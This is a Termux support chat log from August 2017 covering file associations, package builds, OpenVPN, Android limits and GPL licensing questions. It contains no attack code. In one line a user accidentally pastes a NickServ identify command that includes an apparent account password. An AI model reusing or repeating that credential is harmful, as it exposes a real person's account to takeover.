2017-08-09 22:40:50 live_the_dream you could probably do something with changing file name to add .txt at end of it just before xdg-open … but uh … yeah
2017-08-09 22:42:21 poyntz good point. is there a way to change the fileextension in termux to pick up .rc files?
2017-08-09 22:43:17 live_the_dream scripting
2017-08-09 22:43:17 poyntz In Mac there’s an option/plugin in system prefs called ‘Default Apps’ which lets you set URIs, default app, etc.
2017-08-09 22:43:52 poyntz every filename extension on the system gets allocated an app which can be switched
2017-08-09 22:43:53 live_the_dream ugly ugly scripting
2017-08-09 22:43:53 live_the_dream you can do that at os level with android
2017-08-09 22:43:53 live_the_dream cp file to temp add extension
2017-08-09 22:44:08 live_the_dream xdg open that temp file
2017-08-09 22:44:28 poyntz yeh :S
2017-08-09 22:44:52 poyntz there’s not like an .xml file with all filename extensions and their associations tho?
2017-08-09 22:44:54 live_the_dream but yeah … not fun times
2017-08-09 22:45:11 poyntz I have supersu su, so can modify root scripts
2017-08-09 22:45:33 poyntz or busybox su or whatever its called (with root)
2017-08-09 22:46:37 poyntz the /su/xbin/su app which lets you change most things if you mount +rw the sys folder you’re writing to
2017-08-09 22:47:09 live_the_dream yeah i dunno about that stuff
2017-08-09 22:47:42 poyntz that’s ok. thanks for the suggestion
2017-08-09 22:48:04 poyntz you can actually do it via adb off your pc/mac tho, E.g, adb shell am startservice -n packageName/.ServiceClass
2017-08-09 22:48:33 poyntz or adb shell monkey -p com.yourpackage.name -c android.intent.category.LAUNCHER 1
2017-08-09 22:48:59 live_the_dream shoudl be able to do it with root
2017-08-09 22:49:59 poyntz yeh. can’t find the command :S
2017-08-09 22:50:20 poyntz on os X, it’s ‘open -a
2017-08-09 22:51:25 poyntz in su for android that gives you ‘command not found’ lol
2017-08-09 22:53:03 live_the_dream /system/bin/am
2017-08-09 22:58:59 poyntz thanks. just tried with monkey. seems to open the app but not the file :S
2017-08-09 23:00:37 poyntz it’d be great to be able to get some man entries which explain how to use this commands
2017-08-09 23:12:27 poyntz live_the_dream: alright i got it. command is “termux-open –content-type text/html
2017-08-09 23:13:22 poyntz you just tell termux-open what the mime type is and then it pops it up in the app chooser (first time), and defaults it (subsequent times)
2017-08-09 23:13:22 live_the_dream ahh
2017-08-09 23:14:10 poyntz still nfi how to get the manual entries on android tho. need to search manuals on google for everything atm
2017-08-09 23:15:17 poyntz if anyone has any tips please share
2017-08-09 23:16:10 poyntz like do we need to add content to $MANPATH to get commands, if so what? else do we need to install some extra packages? how about with $INFOPATH?
2017-08-09 23:16:50 poyntz e,g, ‘man termux-open’ current gives “man: No entry for termux-open in the manual.”
2017-08-09 23:22:49 gitter (themastersunil) $ pip install beautifulsoup 4
2017-08-09 23:22:49 gitter (themastersunil) Collecting beautifulsoup
2017-08-09 23:22:49 gitter (themastersunil) Using cached BeautifulSoup-3.2.1.tar.gz
2017-08-09 23:22:49 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=598bd189a7b406262d7467ea]
2017-08-09 23:23:23 gitter (themastersunil) Please fix it
2017-08-09 23:50:50 rods-tab3 i posted ‘termux-open –help’’ output last night - please read back
2017-08-09 23:59:04 rods-tab3 also check RTFM https://termux.com/add-on-api.html
2017-08-10 00:07:29 gitter (Thatguy1114) Torch (the deep learning in terminal) shows this output for when I do thr second step of installation:
2017-08-10 00:10:35 gitter (Thatguy1114) rgcheck’…
2017-08-10 00:10:35 gitter (Thatguy1114) fatal: unable to access ‘https://github.com/torch/argcheck.git/’: Couldn’t resolve host ‘github.com’
2017-08-10 00:10:35 gitter (Thatguy1114) fatal: clone of ‘https://github.com/torch/argcheck.git’ into submodule path ‘/data/data/com.termux/files/home/torch/extra/argcheck’ failed
2017-08-10 00:10:35 gitter (Thatguy1114) [full message: https://gitter.im/termux/termux?at=598bdcbac101bc4e3a03ef78]
2017-08-10 00:10:53 gitter (Thatguy1114) Etc and it was on the cloning phase
2017-08-10 01:11:20 gitter (vishalbiswas) @themastersunil try with pip2
2017-08-10 01:35:34 gitter (vishalbiswas) @fornwall we get multiple package requests for root apps. Can we create a sub repo where all root-requiring packages will be available?
2017-08-10 01:40:02 gitter (vishalbiswas) Mostly for fuse. So many people want it
2017-08-10 02:32:54 gitter (vishalbiswas) 95 unread emails overnight. Don’t need reddit frontpage to explode my inbox
2017-08-10 02:52:15 poyntz rods-tab3: thanks rods - yeh managed to launch the GUI editor by nominating –content-type
2017-08-10 02:52:33 poyntz rods-tab3: not as clear cut interoperability with vlc
2017-08-10 02:53:16 poyntz doesn’t really matter with other apps - just more of a luxury if you’re ever working in the Home folder and can randomly launch a file through Movies or whatever
2017-08-10 02:54:03 poyntz termux-open –content-type ‘video/mp4’
2017-08-10 02:54:51 poyntz rods-tab3: also tried installing termux-api via Google Play Store but didn’t seem to change anything from the pkg install termux-api version
2017-08-10 02:55:43 poyntz suspect the api commands are running effectively, just must be some kind of access or interoperability issue between vlc and termux-api
2017-08-10 02:57:24 poyntz nothing termux related seems to run out of /su/xbin/su (Busybox Su) even with the path added to the libpath and $path variables
2017-08-10 05:35:38 live_the_dream hmm flang works … with a few nudges
2017-08-10 07:18:16 poyntz thanks for the help all. ciao
2017-08-10 08:05:30 ishmael /msg NickServ identify freenode_1272
2017-08-10 08:05:55 ishmael doh….. gotta watch for spaces
2017-08-10 08:06:02 ishmael ?
2017-08-10 08:26:41 gitter (pizzapanther) @fornwall @vishalbiswas perfect, is there any web interface for packages? that would help a lot, for example i use https://packages.ubuntu.com/ a lot to search for packages and files inside those packages
2017-08-10 08:27:09 gitter (pizzapanther) if not i could probably help out since i’m a web dev :-)
2017-08-10 08:29:56 gitter (suryapoo) Hey guys
2017-08-10 08:30:19 gitter (suryapoo) How to add another use in termux
2017-08-10 08:31:48 gitter (suryapoo) User*
2017-08-10 09:05:33 gitter (Grimler91) @pizzapanther There isn’t, that would indeed be helpful!
2017-08-10 09:06:46 gitter (Grimler91) @suryapoo Why do you want another user? I’m pretty sure it’s not possible to add due to android
2017-08-10 09:21:49 gitter (suryapoo) @Grimler91 coool..
2017-08-10 09:22:05 gitter (suryapoo) And when I do this less /sdcard/Hi.txt
2017-08-10 09:22:27 gitter (suryapoo) I get a segmentation fault
2017-08-10 09:22:34 gitter (suryapoo) What am I doing wrong
2017-08-10 09:34:21 gitter (Grimler91) @suryapoo Segmentation faults usually means that something is wrong with the program. Open a bug report at github.com/termux/termux-packages and include the full error, your android version + output from uname -a
2017-08-10 09:37:33 ishmael It would be nice to get nvm [ node version manger ] working. - any one able to get that to work?
2017-08-10 09:51:11 gitter (suryapoo) @Grimler91 cool…
2017-08-10 10:04:21 u0_a177 hi
2017-08-10 10:05:46 u0_a177 hi
2017-08-10 10:13:41 gitter (suryapoo) Issued a new issue about less
2017-08-10 10:19:28 gitter (vishalbiswas) @pizzapanther you can use apt and dpkg to search for packages and files.
2017-08-10 10:22:34 gitter (Grimler91) @vishalbiswas doesn’t dpkg only show info for files you already have on your system? I.e. if I get an error that Python.h is missing, dpkg can’t tell me which package to install
2017-08-10 10:23:53 gitter (vishalbiswas) well, that’s true for termux repos
2017-08-10 10:29:53 gitter (Grimler91) @vishalbiswas On another note: do you remember the status of openvpn? The latest comment about it was from April and says that it doesn’t work. I managed to build it (had to change the getpass patching) but it doesn’t seem to work to open a tunnel (“Linux ip link set failed: could not execute external program”), is this the most current status?
2017-08-10 10:34:14 gitter (vishalbiswas) @Grimler91 Do you have root? Even then it does not work. It will connect to the server and all, but I can’t figure out a way to route all traffic through it
2017-08-10 10:34:36 gitter (Ashish882) Hi
2017-08-10 10:34:55 gitter (Ashish882) How to install java in termux
2017-08-10 10:35:25 gitter (vishalbiswas) @Ashish882 wiki.termux.com has a section about java
2017-08-10 10:37:20 gitter (Ashish882) OK
2017-08-10 10:38:27 gitter (Ashish882) @vishalbiswas copy a code of other and uploading them with some change are right in github or wrong
2017-08-10 10:40:01 gitter (vishalbiswas) @Ashish882 depends on the license they specify
2017-08-10 10:40:54 gitter (Ashish882) If there is license in any code we can’t come them
2017-08-10 10:42:12 gitter (vishalbiswas) @Ashish882 there are different types of licenses and they specify how the code can be used or redistributed
2017-08-10 10:42:41 gitter (vishalbiswas) Read this -> https://choosealicense.com/licenses/
2017-08-10 10:44:54 gitter (Grimler91) @vishalbiswas have root, yes. Hm, do we get the same error? Here’s an output from my device:
2017-08-10 10:44:54 gitter (Grimler91) [SOME VPN] Peer Connection Initiated with [AF_INET]AN_IP_ADDRESS
2017-08-10 10:44:54 gitter (Grimler91) Option ‘explicit-exit-notify’ in [PUSH-OPTIONS]:7 is ignored by previous
2017-08-10 10:44:54 gitter (Grimler91) [full message: https://gitter.im/termux/termux?at=598c7165bc464729746eb4a9]
2017-08-10 10:46:04 gitter (Grimler91) @vishalbiswas I’ll have a look at the openvpn app (when I have time) and see if I can come up with some patches that helps
2017-08-10 10:46:16 gitter (vishalbiswas) @Grimler91 that’d be great
2017-08-10 10:46:36 gitter (vishalbiswas) for my device, everything succeeds
2017-08-10 10:46:45 gitter (vishalbiswas) but I just don’t have the route through vpn
2017-08-10 10:46:49 gitter (vishalbiswas) no errors nothing
2017-08-10 10:47:04 gitter (vishalbiswas) and it should not use /system/bin/ip
2017-08-10 10:47:14 gitter (vishalbiswas) it should use the one from net-tools package
2017-08-10 10:51:55 gitter (Grimler91) @vishalbiswas I was playing around trying to get it to work and changed from $PREFIX/bin/{ip,route,…} to /system/bin/{…}. I think I got the same error with net-tools as well but I should re-check that.
2017-08-10 11:06:21 gitter (Grimler91) @vishalbiswas Nope, same error
2017-08-10 11:11:16 gitter (vishalbiswas) I only tested ipv4 so…
2017-08-10 11:11:33 gitter (Ashish882) @vishalbiswas
2017-08-10 11:11:35 gitter (Ashish882)
2017-08-10 11:11:35 gitter (Ashish882) Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
2017-08-10 11:11:35 gitter (Ashish882) Everyone is permitted to copy and distribute verbatim copies
2017-08-10 11:11:35 gitter (Ashish882) [full message: https://gitter.im/termux/termux?at=598c77a7210ac269206f2050]
2017-08-10 11:11:56 gitter (Ashish882) It mean I can’t add some new file in it
2017-08-10 11:12:09 gitter (Ashish882) If I add in it what happen
2017-08-10 11:13:30 gitter (vishalbiswas) That header says modifying “it” which refers to that license file and not the code in that repo
2017-08-10 11:16:52 gitter (pizzapanther) for nodejs-current how often does that get updated? right now it has problems with npm install, so like 8.3.0 came out today, what’s the process cycle like?
2017-08-10 11:22:47 gitter (Ashish882) @vishalbiswas last question
2017-08-10 11:23:56 gitter (Ashish882) I want to make changes in this repo. And then re upload it with my name or with differt name .Can I do this?
2017-08-10 11:42:54 sdrausty 679 packages that are available for Termux. https://sdrausty.github.io/pages/more Wow! Thank you.
2017-08-10 12:17:30 gitter (suryapoo) Gr8888888888888
2017-08-10 12:33:21 gitter (vishalbiswas) @pizzapanther As soon as someone updates the version number and source checksum in termux-packages repo
2017-08-10 12:33:48 gitter (vishalbiswas) @Ashish882 which repo>
2017-08-10 12:40:34 gitter (Ashish882)
2017-08-10 12:40:34 gitter (Ashish882) from misc import *
2017-08-10 12:40:34 gitter (Ashish882) import crypt
2017-08-10 12:40:34 gitter (Ashish882) [full message: https://gitter.im/termux/termux?at=598c8c82210ac269206f7e1c]
2017-08-10 12:41:00 gitter (Ashish882) @vishalbiswas
2017-08-10 12:41:03 gitter (Ashish882) https://github.com/toxic-ig/Trity
2017-08-10 12:41:08 gitter (Ashish882) This repo.
2017-08-10 12:41:55 gitter (Ashish882) I want to make changes in it and want to re upload this with my changes
2017-08-10 12:45:23 gitter (vishalbiswas) You can, as long as you have the same license and specify the original author
2017-08-10 12:45:36 gitter (vishalbiswas) https://choosealicense.com/licenses/gpl-3.0/
2017-08-10 12:52:25 gitter (Ashish882) OK thanks
2017-08-10 12:53:39 gitter (suryapoo) $ ln fun fun-hard
2017-08-10 12:53:39 gitter (suryapoo) ln: failed to create hard link ‘fun-hard’ => ‘fun’: Permission denied
2017-08-10 12:54:07 gitter (suryapoo) I get permission denied when I try to hard link ..I’m in $HOME
2017-08-10 12:54:14 gitter (suryapoo) please help
2017-08-10 12:54:35 gitter (Ashish882) I have to made file of this licence only or deleting the other licence of outhiur
2017-08-10 12:54:39 gitter (Ashish882) @vishalbiswas
2017-08-10 12:55:10 gitter (Ashish882) @suryapoo because you don’t give permissions
2017-08-10 12:56:04 gitter (suryapoo) Should I use chmod?
2017-08-10 12:56:52 gitter (vishalbiswas) @suryapoo Hard links are not supported on android
2017-08-10 12:57:40 gitter (vishalbiswas) @Ashish882 can’t understand what yoy are trying to say
2017-08-10 12:57:53 gitter (suryapoo) Ohhh.. Alrighty.. Any other stuff that is not supported?
2017-08-10 12:58:23 gitter (vishalbiswas) Lots of things
2017-08-10 12:59:22 gitter (suryapoo) Ohhhhhh..cool…thanks… But can I learn bash from practicing in termux?
2017-08-10 13:01:31 gitter (vishalbiswas) Yes
2017-08-10 13:01:33 gitter (Ashish882) @vishalbiswas I make that licence which is given by you and deleted the licence of the other
2017-08-10 13:02:10 gitter (Ashish882) Other
2017-08-10 13:02:25 gitter (vishalbiswas) No, just clone that repo and make changes to the code
2017-08-10 13:02:51 gitter (Ashish882) Or licence
2017-08-10 13:03:22 gitter (Ashish882) Outher’s licence or other
2017-08-10 13:03:46 gitter (Ashish882) OK….. @vishalbiswas
2017-08-10 13:04:26 gitter (vishalbiswas) license should not be changed at all. GPLv3 license requires that any modified code should also be licensed under GPLv3
2017-08-10 13:06:02 gitter (Ashish882) OK…..
2017-08-10 13:15:23 gitter (suryapoo) Thanks @vishalbiswas
2017-08-10 13:33:32 gitter (Auxilus) @vishalbiswas @fornwall can we get auto command completion?
2017-08-10 13:33:58 gitter (Auxilus) Like then i press tab
it’ll automatically complete the command
2017-08-10 13:44:34 gitter (vishalbiswas) @Auxilus Ever used fish shell? apt install fish; chsh -s fish
then restart termux
2017-08-10 13:47:37 gitter (Auxilus) How can i change it back to default shell?
2017-08-10 13:57:58 gitter (Auxilus) Nice shell @vishalbiswas ty
2017-08-10 15:19:52 gitter (Grimler91) @vishalbiswas just fyi, openvpn opens a tunnel as expected on my phone (android 7) but gives the reported error on my tablet (android 5) so I’m guessing the error is android 5 related
2017-08-10 20:41:26 sdrausty I have an aapt
question; How significant is, “note: removing attribute http://schemas.android.com/apk/res/android:imeOptions from
2017-08-10 20:42:05 sdrausty Has anyone else here built termux-app on device?
2017-08-10 20:43:21 sdrausty This is where note: removing attribute… note is generated.
2017-08-10 20:53:20 sdrausty during aapt package ...
2017-08-10 21:02:54 adisib I recently was given a cheap old Android device. I want to install termux, but the Google Play Store says it isn’t compatible. What are the requirements for Termux?
2017-08-10 21:05:20 sdrausty adisib: What Android version do you have?
2017-08-10 21:07:03 adisib The device in question is 4.4.2
2017-08-10 21:11:54 sdrausty https://plus.google.com/103283781914164469886/posts/5qFEznQG6Q9
2017-08-10 21:12:25 sdrausty https://www.google.com/search?q=kitkat+android+version
2017-08-10 21:16:05 adisib Termux doesn’t support KitKat? Why is that?
2017-08-10 21:17:18 adisib It is very unfortunate. I will have to look for an alternative solution then.
2017-08-10 21:18:54 adisib Is there any chance there is an older version that does and can be acquired?
2017-08-10 21:26:11 adisib Nevermind, it looks like the packages wont be compatible even if the core app is. I enjoy it on my personal device at least.
2017-08-10 21:27:25 sdrausty https://github.com/termux/termux-app/issues?utf8=✓&q=kitkat%20
2017-08-10 22:56:38 gitter (suryapoo) Theres no passwd in /etc in termux?
2017-08-10 22:57:44 live_the_dream android is single user
2017-08-10 22:58:28 gitter (suryapoo) Cool..
2017-08-10 22:58:38 gitter (suryapoo) Can i change the username?
2017-08-10 23:05:03 gitter (suryapoo) Guys..theres a text file..and i set the permission as : chmod 400 (filename)..that means it is read only..but when i use rm ..it is deleted ..y?
2017-08-10 23:07:05 gitter (suryapoo) Okay..i got it…read only prevents from writing and executing ..not deleting
2017-08-10 23:32:06 vishalbiswas @Grimler91 I use Android 5 only.
2017-08-10 23:52:44 rods-tab3 sidetopic: requires android>=2.2 https://play.google.com/store/apps/details?id=com.gnuroot.debian
2017-08-11 01:12:00 imaami hi, getting an error trying to run yle-dl installed via pip:
2017-08-11 01:12:13 imaami “ImportError: Cannot import name ‘download’”
2017-08-11 01:14:51 imaami sorry for not having the full traceback, not going to hand-type it
2017-08-11 02:00:44 live_the_dream imaami: use python 2
2017-08-11 02:00:44 live_the_dream and then use pip2
2017-08-11 03:10:07 gitter (suryapoo) Is there a bashrc file in termux
2017-08-11 03:10:19 gitter (suryapoo) I did ls -a..but couldn’t find any
2017-08-11 03:19:17 frumpylava Does anybody know how I can install an npm package that claims unsupported OS? It claims valid OS’ are “darwin,linux,win32”, but having android it can’t be installed.
2017-08-11 03:50:09 gitter (Grimler91) @suryapoo you can create it. There isn’t one in the home folder per default
2017-08-11 04:04:59 gitter (suryapoo) Cool..thanks @Grimler91
2017-08-11 04:27:25 mr1404 ~~
2017-08-11 06:59:35 gitter (suryapoo) How to run ftp in termux
2017-08-11 07:15:30 gitter (fornwall) @suryapoo an ftp client? install it with pkg install inetutils
, then run ftp
2017-08-11 07:22:29 gitter (suryapoo) Cool..thanks @fornwall
2017-08-11 08:47:51 jesusc hiiiii
2017-08-11 08:48:22 jesusc anyone have any idea for installing fpc ide and compiler in termux?/
2017-08-11 08:48:34 live_the_dream recklessly accepting pull requests with no regard for human life?
2017-08-11 08:48:44 jesusc oO
2017-08-11 08:48:57 jesusc yeah…..
2017-08-11 08:49:23 fornwall live_the_dream: :)
2017-08-11 08:50:02 frumpylava live_the_dream: Well at least the vital package nyancat is finally available on termux.
2017-08-11 08:53:30 live_the_dream we have made do with cheap imitators of nyanncat
2017-08-11 08:53:30 live_the_dream no longer
2017-08-11 08:55:14 frumpylava I finally upgraded to a 256 GB SD card :)
2017-08-11 08:56:04 fornwall and cmatrix got a release after 15 years :)
2017-08-11 08:56:06 fornwall https://github.com/abishekvashok/cmatrix/releases
2017-08-11 08:57:01 fornwall damned, 256 GB SD cards. the future is now
2017-08-11 08:57:56 frumpylava yeah. My phone has now the same amount of storage as my laptop.
2017-08-11 09:00:42 frumpylava being able to pause cmatrix is pretty cool.
2017-08-11 09:20:18 sdrausty frumpylava: Congratulations on your space upgrade! Keep your laptop off. Let’s get Termux to work completely on device.
2017-08-11 09:21:11 sdrausty https://www.engadget.com/amp/2017/08/08/intels-push-for-petabyte-ssds-requires-a-new-kind-of-drive/
2017-08-11 09:26:00 frumpylava sdrausty: To be fair I only use my laptop to connect to termux anyway.
2017-08-11 09:28:41 sdrausty I can to a fairly simple conclusion last year. If I stop using “computers” and invest my time in Termux, I will be free from clunky laptop and its’ cousin, the desktop.
2017-08-11 09:28:58 sdrausty can *came
2017-08-11 09:31:06 frumpylava sdrausty: what about typing and big screen? How will you do that?
2017-08-11 09:34:52 frumpylava I’m still searching for a way to phisically attach my phone to my laptop.
2017-08-11 09:35:28 sdrausty frumpylava: This frame of thought has its’ advantages and its’ disadvantages too. It boils down to whether you want to have it discreetly in your pocket, or not. Big screen https://www.google.com/search?q=android+screen+projector
2017-08-11 09:36:23 imaami live_the_dream: thanks, i forgot to check irc but figured it out myself. python3 still giving all sorts of trouble
2017-08-11 09:38:29 imaami sdrausty: it’s kind of funny that Google spent an enormous amount of R&D on converting GNU/Linux into a Java-infused mess, and now Termux has to undo the misstep inside it
2017-08-11 09:39:07 imaami in the end i don’t think anyone has any clue what the ultimate benefit was
2017-08-11 09:39:22 imaami Android is nice, but it’s also Frankenstein’s manbearpig
2017-08-11 09:39:45 frumpylava sdrausty: Well I still like the “Laptop” formfactor occasionally, and I am quite happy using termux attached to it. Connecting via ssh over usb is really convenient, especially since buying magnetic cables.
2017-08-11 09:40:09 imaami i don’t think it would’ve been impossible to add strict security domains to a normal GNU/Linux environment, what is the f*cking deal with the Java
2017-08-11 09:41:47 sdrausty frumpylava: It takes a while to become proficient at Gboard. It does. I am still improving my multi-finger onscreen typing. The word suggestions feature is improving. Much like offline voice typing is too.
2017-08-11 09:48:53 frumpylava imaami: There was once a pull request with wine, but it has been closed without merging it. https://github.com/termux/termux-packages/pull/332
2017-08-11 09:50:37 sdrausty imaami: Android is RPN (Reverse Polish Notation) at the UI and internals too.
2017-08-11 09:50:37 frumpylava It was back when @fornwall really wanted people to create a 3rd party repo ;)
2017-08-11 09:51:40 live_the_dream the java is so people can relas3 app ajd have it run on i686 arm and mips
2017-08-11 09:52:27 sdrausty What OSes does Termux run on? Android, Chrome… Anything else?
2017-08-11 09:52:41 live_the_dream that is it
2017-08-11 09:53:01 sdrausty thx
2017-08-11 09:53:29 live_the_dream no reason to use termux anywh34e els3
2017-08-11 09:54:31 live_the_dream also google didn;t invest
2017-08-11 09:54:35 live_the_dream it was nade and google bought
2017-08-11 09:55:31 live_the_dream google just made it suck less
2017-08-11 09:57:48 frumpylava I’m just still salty that dwarf fortress doesn’t run on termux.
2017-08-11 09:58:39 frumpylava I’m sure if it was open source it could easily be patched for termux.
2017-08-11 09:59:32 sdrausty frumpylava: I don’t like the battery life on notebooks. Nor do I like laptop inconspicuousness, for instance at a transit stop or at a park.
2017-08-11 10:00:11 sdrausty Does your weechat jump about with garbage onscreen too?
2017-08-11 10:00:52 frumpylava Occasionally weechat will do weird things when people use emoji for me.
2017-08-11 10:03:21 frumpylava I really like the ‘plug and play’ aspect of my termux setup. When I am at a hackerspace I’ll use termux connected to a laptop. When I am at work I’ll use termux connected to my windows pc at work. When I am on the move I will use Termux with on the Phone directly.
2017-08-11 10:03:47 sdrausty If Termux could load its’ own kernel and libraries… live_the_dream?
2017-08-11 10:04:43 frumpylava sdrausty: Why would it need to. If you can load your own kernal and libraries you might as well use a debian.
2017-08-11 10:06:42 sdrausty flympylava: The Termux could run on Windows, iOS and more, kind of like wine.
2017-08-11 10:08:58 frumpylava sdrausty: to load it’s own kernel in windows it would need to run some kind of virtual machine. Which is when you can run debian instead again.
2017-08-11 10:09:57 sdrausty on device please remmember in your pocket
2017-08-11 10:10:32 frumpylava what?
2017-08-11 10:14:25 sdrausty https://www.cultofmac.com/141909/run-windows-apps-on-your-mac-with-wine-video-how-to/
2017-08-11 10:15:25 frumpylava sdrausty: But what would be the benefit of using termux on windows when you could run debian on windows?
2017-08-11 10:15:42 sdrausty Termux should be able to run on more than 2 OSes. Namely iOS (tm) and Windows (tm)
2017-08-11 10:16:07 sdrausty on tablet or smartphone
2017-08-11 10:19:27 ishmael sorry all I don’t have a persistent client, any one have any luck getting nvm [node version manger] to run
2017-08-11 10:19:34 sdrausty This enhancement would morph Termux into what it is, plus an emulator.
2017-08-11 10:20:47 sdrausty ismael: No command ‘nvm’ found…
2017-08-11 10:20:58 frumpylava sdrausty: I guess this could be useful for some people, but it would be a huge technical challange.
2017-08-11 10:23:59 sdrausty frumpylava: Yes it would be an enormous technical challenge; And with our meger resources we do have more important issues https://github.com/termux/termux-packages/issues
2017-08-11 10:24:20 frumpylava sdrausty: indeed
2017-08-11 10:30:43 sdrausty frumpylava: Which of these issues are really important? Does anyone know how to start a pool on Google+ ?
2017-08-11 10:40:03 frumpylava sdrausty: All my issues, of course :P
2017-08-11 10:40:15 gitter (sdrausty) lol
2017-08-11 10:40:39 gitter (sdrausty) pool *poll
2017-08-11 10:51:00 frumpylava fornwall: damn, your on fire closing issues and PRsthese last few days
2017-08-11 10:51:11 frumpylava ;)
2017-08-11 10:54:28 gitter (kuburan) hello everybody, i need help, i try to install John The Ripper. i type “make SHELL=$PREFIX/bin/sh” . i got error like this :
2017-08-11 10:54:32 gitter (kuburan) gcc -DAC_BUILT -arch host -DJOHN_aarch64 -c -g -O2 -DARCH_LITTLE_ENDIAN=1 -Wall -Wdeclaration-after-statement -fomit-frame-pointer -Wno-deprecated-declarations -Wformat-extra-args -Qunused-arguments -std=gnu89 -Wdate-time -D_POSIX_SOURCE -D_GNU_SOURCE -D_XOPEN_SOURCE=600 -I/data/data/com.termux/files/usr/include -funroll-loops -DJTR_MODE -Wno-declaration-after-statement -std=c99 -c pp.c
2017-08-11 10:54:32 gitter (kuburan) clang-4.0: error: unable to execute command: Segmentation fault clang-4.0: error: clang frontend command failed due to signal (use -v to see invocation) clang version 4.0.1 (tags/RELEASE_401/final) Target: aarch64–linux-android
2017-08-11 10:54:32 gitter (kuburan) Thread model: posix InstalledDir: /data/data/com.termux/files/usr/bin clang-4.0: note: diagnostic msg: PLEASE submit a bug report to http://llvm.org/bugs/ and include the crash backtrace, preprocessed source, and associated run script. clang-4.0: note: diagnostic msg:
2017-08-11 10:54:32 gitter (kuburan) [full message: https://gitter.im/termux/termux?at=598dc5282723db8d5e956e88]
2017-08-11 10:55:16 gitter (kuburan) Is it possible to install john in termux ?
2017-08-11 11:36:24 sdrausty Garbage onscreen in weechat is very annoying making weechat close to useless. This was not the case a while ago…
2017-08-11 11:36:53 sdrausty https://github.com/termux/termux-packages/issues/1252
2017-08-11 12:07:18 fornwall sdrausty (or another weechat user): can you try ssh:ing into termux and run weechat, and check if you can reproduce the above mentioned problem there?
2017-08-11 12:07:41 fornwall would be good to know if the problem is with the terminal emulator part, or the weechat program
2017-08-11 12:15:01 sdrausty fornwal: less flickering in ssh than in bash
2017-08-11 12:15:17 sdrausty ssh *ssh bash
2017-08-11 12:15:41 sdrausty but
2017-08-11 12:16:01 sdrausty garbage in ssh bash connection too
2017-08-11 12:19:11 sdrausty screenshots updated at https://github.com/termux/termux-packages/issues/1252
2017-08-11 12:50:32 parvathy Cant update termux or download any package with wifi unless i use a vpn. anybody know why?
2017-08-11 13:08:49 u0_a81 hi
2017-08-11 13:08:57 jesusc hiii
2017-08-11 13:09:23 jesusc does anyone like pascal / know how to xinstall fpc on termux?
2017-08-11 13:09:42 jesusc please
2017-08-11 13:25:15 sdrausty jesusc: Hi. It appears that there is no package at present that install pascal.
2017-08-11 13:26:15 jesusc i dont find it
2017-08-11 13:26:29 sdrausty You can put in a papckage request at https://github.com/termux/termux-packages/issues/new
2017-08-11 13:27:21 jesusc how can i know if there is or not
2017-08-11 13:27:39 jesusc_ :/
2017-08-11 13:28:47 sdrausty http://www.gnu-pascal.de/gpc/h-index.html might be easy to package
2017-08-11 13:29:04 sdrausty jesusc_: https://github.com/termux/termux-packages/issues?utf8=✓&q=Pascal
2017-08-11 13:29:59 sdrausty To create a package please see https://github.com/termux/termux-create-package
2017-08-11 13:31:34 u0_a81 well
2017-08-11 13:32:06 jesusc that package doesnt exist (fpc)
2017-08-11 13:33:30 sdrausty jesusc: Have you tried the links I posted for you? In short, there is no pascal in Termux at present.
2017-08-11 13:34:21 sdrausty And in probably can be packaged using termux-create-package from source.
2017-08-11 13:34:53 sdrausty in *it
2017-08-11 13:41:12 nobodyiswatching Anybody successfully build dnscrypt with termux?
2017-08-11 13:55:56 gitter (vishalbiswas) jesusc: you can use linux binaries from freepascal.org
2017-08-11 17:47:24 live_the_dream hmm that is odd aarch64 can’t build numpy ?
2017-08-11 18:23:59 sdrausty live_the_dream: https://github.com/termux/termux-packages/issues?utf8=✓&q=numpy
2017-08-11 18:24:52 live_the_dream its not there which i am here
2017-08-11 18:24:52 live_the_dream is why
2017-08-11 18:25:14 sdrausty live_the_dream: Are you building on device?
2017-08-11 18:26:02 live_the_dream …
2017-08-11 18:26:54 sdrausty a smartphone or a tablet running Android or Chrome?
2017-08-11 18:26:54 live_the_dream im the guy who distributes numpy + scipy
2017-08-11 18:27:04 live_the_dream …
2017-08-11 18:37:42 sdrausty cool
2017-08-11 18:56:52 gitter (sdrausty) live _the_dream: Any ideas on how to spread the word about using your smartphone as a peripherals integrated computer via Termux throughout the Internet? I have tried posting into related groups, like Linux, only to find my posts about Termux deleted.
2017-08-11 18:57:46 live_the_dream don’t do that
2017-08-11 18:58:25 live_the_dream if you build it they will come
2017-08-11 18:58:25 live_the_dream no one likes spam
2017-08-11 18:58:25 live_the_dream okay can’t build in normal shell
2017-08-11 18:58:26 live_the_dream can work via ssh and tmux …
2017-08-11 18:59:53 gitter (sdrausty) live_the_dream: tnx Is it easy to misclassify spam, into spam?
2017-08-11 19:00:58 gitter (sdrausty) live_the_dream: lol
2017-08-11 19:01:39 gitter (sdrausty) “if you build it they will come”
2017-08-11 19:03:53 gitter (sdrausty) Termux is far from the mainstream. Nobody has ever heard about it. I searched, and researched Linux on Android last year to stumble upon Termux.
2017-08-11 19:04:40 gitter (sdrausty) https://www.google.com/search?q=linux+on+android
2017-08-11 19:07:37 gitter (sdrausty) https://www.google.com/q=linux+on+android+site%3Atldp.org
2017-08-11 19:08:15 gitter (sdrausty) https://www.google.com/search?q=linux+on+android+site%3Atldp.org
2017-08-11 19:10:00 gitter (sdrausty) https://duckduckgo.com/?q=linux+on+android+site%3Atldp.org is much better at pointing toward Termux than Google, but still no Termux lead. Where’s Termux?
2017-08-11 19:11:24 gitter (sdrausty) Termux is one of the best kept secrets of 2017! Just as it was in 2016…
2017-08-11 19:13:53 gitter (sdrausty) Plus we are hemoraging rooted
by who knows what and whome tablet and smartphone users.
2017-08-11 19:32:02 sdrausty http://www.tldp.org/en/Linux-Android-HOWTO/Linux-Android-HOWTO-6.html
2017-08-11 19:50:22 ghost_clown hai
2017-08-11 19:51:12 sdrausty https://en.m.wikipedia.org/wiki/List_of_Linux_distributions
2017-08-11 19:59:14 rods-tab3 termux second https://www.google.com/search?q=terminal+android&ie=utf-8&oe=utf-8
2017-08-11 20:21:15 rod_yolo2 https://www.google.com/amp/s/www.xda-developers.com/termux-the-ultimate-linux-terminal-emulator-for-android-xda-spotlight/amp/
2017-08-11 21:24:10 gitter (mklein994) Just a hunch, but I think nodejs-current
is trying to create hard links. Anyone else have the error cb() is never called!
? (What is cb()
anyway?)
2017-08-11 21:24:34 gitter (mklein994) It’s preventing me from installing any packages.
2017-08-11 21:24:58 sdrausty https://github.com/sdrausty/buildAPKs/issues/3
